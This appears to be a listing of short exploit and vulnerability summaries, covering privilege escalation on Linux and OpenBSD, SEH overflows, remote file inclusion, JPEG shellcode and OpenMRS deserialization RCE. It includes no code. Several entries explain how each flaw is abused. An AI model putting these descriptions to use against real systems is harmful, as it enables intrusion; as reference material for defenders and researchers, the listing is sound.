This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
This module exploits a vulnerability in the OpenBSD ld.so dynamic loader (CVE-2019-19726). The _dl_getenv() function fails to reset the LD_LIBRARY_PATH environment variable when set with approximately ARG_MAX colons. This can be abused to load libutil.so from an untrusted path, using LD_LIBRARY_PATH in combination with the chpass set-uid executable, resulting in privileged code execution. This module has been tested successfully on OpenBSD 6.1 (amd64) and OpenBSD 6.6 (amd64).
The Prime95 software version 29.8 build 6 is vulnerable to a buffer overflow (SEH) vulnerability. By running a python code, an attacker can exploit this vulnerability to gain unauthorized access to the system and execute arbitrary code. The exploit involves opening a malicious file, copying its content to the clipboard, and then pasting it into specific fields within the Prime95.exe application. This results in the creation of a bind shell on port 3110, providing the attacker with a remote command execution capability. The vulnerability is present in the libhwloc-15.dll library. The exploit code includes shellcode generated using msfvenom, which ensures compatibility with the Windows platform and avoids certain characters that may cause issues. The exploit has been tested on Windows 7 x64.
The vulnerability allows an attacker to include a remote file by manipulating the 'loadadminpage' parameter in the 'index.php' file. This can lead to remote code execution and compromise of the target system.
This is a shellcoded exploit for the Windows JPEG GDI+ Overflow vulnerability (MS04-028). It is a generic win32 http download shellcode that can be used to download and execute arbitrary code on a vulnerable system. The shellcode is designed to avoid the end of jpeg image marker (0xFFh 0xD9) and has a size of approximately 2500 bytes.
A Null pointer deference exists in the WARPGPUCMDSYNC function of the BasicRender.sys driver. An unprivileged user can trigger the vulnerability to crash the system and deny the service to the rest of the users.
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the deutsche bahn ticket vending machine series with windows xp.
This exploit triggers a denial of service vulnerability in SurfOffline Professional version 2.2.0.103. By providing a specially crafted payload as the 'Project Name' parameter, an attacker can cause the program to crash, overwriting the SEH (Structured Exception Handling) value.
The FTP Navigator 8.03 software is vulnerable to a denial of service (DoS) attack when a specially crafted payload is sent to the 'Custom Command' input box. This can cause the program to crash, overwriting the Structured Exception Handler (SEH) and potentially leading to remote code execution.
OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as `/ws/rest/v1/concept`. This module uses an XML payload generated with Marshalsec that targets the ImageIO component of the XStream library. Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java 8 and Java 9.
Services By CQR